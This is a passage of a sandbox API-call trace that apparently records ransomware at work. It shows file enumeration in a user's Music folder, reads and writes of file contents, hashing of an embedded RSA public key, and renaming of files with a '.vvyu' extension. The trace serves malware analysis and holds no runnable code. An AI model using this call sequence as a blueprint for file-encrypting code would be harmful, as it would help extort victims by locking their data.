dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0197.108] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0197.108] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0197.109] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0197.109] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0197.109] WriteFile (in: hFile=0x52c, lpBuffer=0x2d4f778*, nNumberOfBytesToWrite=0xfe49, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d4f778*, lpNumberOfBytesWritten=0x30ffb14*=0xfe49, lpOverlapped=0x0) returned 1 [0197.111] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d4f778 | out: hHeap=0x6a0000) returned 1 [0197.111] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0xfe4e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.111] WriteFile (in: hFile=0x52c, lpBuffer=0x2be2220*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2be2220*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0197.112] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0197.112] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0197.112] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0197.112] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0197.112] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0197.112] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0197.113] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0197.113] WriteFile (in: hFile=0x52c, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0197.113] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0197.113] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0197.113] WriteFile (in: hFile=0x52c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0197.114] CloseHandle (hObject=0x52c) returned 1 [0197.115] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b3e8 [0197.115] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8d0) returned 0x2d3a670 [0197.115] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b3e8 | out: hHeap=0x6a0000) returned 1 [0197.115] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\61X TO95hR3JMn6Z\\D1e2c5.wav" (normalized: "c:\\users\\keecfmwgj\\music\\fuhvly4jeagwk\\ipggqug4\\psrckmpedif_ oxvk\\61x to95hr3jmn6z\\d1e2c5.wav"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\61X TO95hR3JMn6Z\\D1e2c5.wav.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\fuhvly4jeagwk\\ipggqug4\\psrckmpedif_ oxvk\\61x to95hr3jmn6z\\d1e2c5.wav.vvyu")) returned 1 [0197.119] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0197.119] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0197.120] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0197.122] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0197.122] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84278f70, ftCreationTime.dwHighDateTime=0x1d8a4e9, ftLastAccessTime.dwLowDateTime=0xcaa47790, ftLastAccessTime.dwHighDateTime=0x1d8a581, ftLastWriteTime.dwLowDateTime=0xcaa47790, ftLastWriteTime.dwHighDateTime=0x1d8a581, nFileSizeHigh=0x0, nFileSizeLow=0x5611, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kf5kyH.m4a", cAlternateFileName="")) returned 1 [0197.122] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.122] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x106) returned 0x2c4bb80 [0197.122] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.122] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\61X TO95hR3JMn6Z\\kf5kyH.m4a") returned=".m4a" [0197.122] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\61X TO95hR3JMn6Z\\kf5kyH.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\fuhvly4jeagwk\\ipggqug4\\psrckmpedif_ oxvk\\61x to95hr3jmn6z\\kf5kyh.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0197.125] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=22033) returned 1 [0197.125] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0197.127] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x55eb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.127] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0197.129] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0197.129] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0197.129] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0197.129] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x5611, lpOverlapped=0x0) returned 1 [0197.130] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.130] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0197.130] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.130] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.130] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea920) returned 1 [0197.131] CryptCreateHash (in: hProv=0x6ea920, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0197.131] CryptHashData (hHash=0x2cbf990, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0197.131] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0197.131] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0197.131] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0197.131] GetLastError () returned 0x0 [0197.131] CryptDestroyHash (hHash=0x2cbf990) returned 1 [0197.131] CryptReleaseContext (hProv=0x6ea920, dwFlags=0x0) returned 1 [0197.132] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0197.132] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0197.132] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0197.132] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0197.132] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0197.132] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0197.132] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0197.132] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x5610) returned 0x2d4f778 [0197.132] SetFilePointer (in: hFile=0x52c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0197.132] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0197.133] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0197.133] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0197.133] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0197.133] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0197.133] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2d118 [0197.133] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a330 [0197.133] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2d160 [0197.133] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a348 [0197.133] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a378 [0197.133] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a3d8 [0197.133] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a390 [0197.133] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0197.133] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0197.133] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0197.133] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0197.133] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a378 | out: hHeap=0x6a0000) returned 1 [0197.133] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a390 | out: hHeap=0x6a0000) returned 1 [0197.133] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a3d8 | out: hHeap=0x6a0000) returned 1 [0197.134] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0197.134] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0197.134] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a3d8 [0197.134] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0197.134] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a390 [0197.134] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c443e8 [0197.134] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d3a378 [0197.134] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0197.134] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2be2220 [0197.134] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0197.135] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0197.135] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0197.135] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bec8 [0197.135] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0197.135] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0197.135] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0197.135] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a390 | out: hHeap=0x6a0000) returned 1 [0197.135] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0197.135] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a378 | out: hHeap=0x6a0000) returned 1 [0197.135] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0197.135] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0197.135] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a3d8 | out: hHeap=0x6a0000) returned 1 [0197.136] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0197.136] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0197.137] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0197.137] GetCurrentThreadId () returned 0x264 [0197.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0197.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d4b940 [0197.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84cc0 [0197.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea920 [0197.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d4d790 [0197.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0197.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0197.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0197.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0197.138] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0197.138] GetCurrentThreadId () returned 0x264 [0197.138] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0197.138] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0197.138] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x74ad40 [0197.138] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0197.139] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0197.139] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0197.139] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0197.139] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0197.139] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0197.139] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0197.139] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a60 [0197.139] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0197.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0197.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0197.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a3d8 [0197.140] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0197.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0197.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0197.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0197.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0197.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0197.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0197.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0197.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a378 [0197.140] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0197.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0197.140] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0197.141] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0197.141] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0197.141] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0197.141] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0197.141] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a390 [0197.141] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0197.141] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c443e8 [0197.141] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0197.141] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a360 [0197.141] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0197.141] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a3f0 [0197.141] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0197.141] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0197.142] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0197.142] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a3c0 [0197.142] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0197.142] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a3a8 [0197.142] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0197.142] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a408 [0197.142] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a3a8 | out: hHeap=0x6a0000) returned 1 [0197.142] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a3a8 [0197.142] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a3c0 | out: hHeap=0x6a0000) returned 1 [0197.142] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0197.142] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0197.142] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0197.142] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0197.142] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0197.143] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a378 | out: hHeap=0x6a0000) returned 1 [0197.143] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a378 [0197.143] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0197.143] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2ccdff0 [0197.143] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a3d8 | out: hHeap=0x6a0000) returned 1 [0197.143] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bfe0 [0197.143] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a408 | out: hHeap=0x6a0000) returned 1 [0197.143] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0197.143] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0197.143] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c0ec50 [0197.143] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0197.143] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0197.143] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a378 | out: hHeap=0x6a0000) returned 1 [0197.143] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0197.144] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bfe0 | out: hHeap=0x6a0000) returned 1 [0197.144] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0197.144] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0197.144] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea920 | out: hHeap=0x6a0000) returned 1 [0197.145] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0197.145] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0197.145] HeapFree (in: 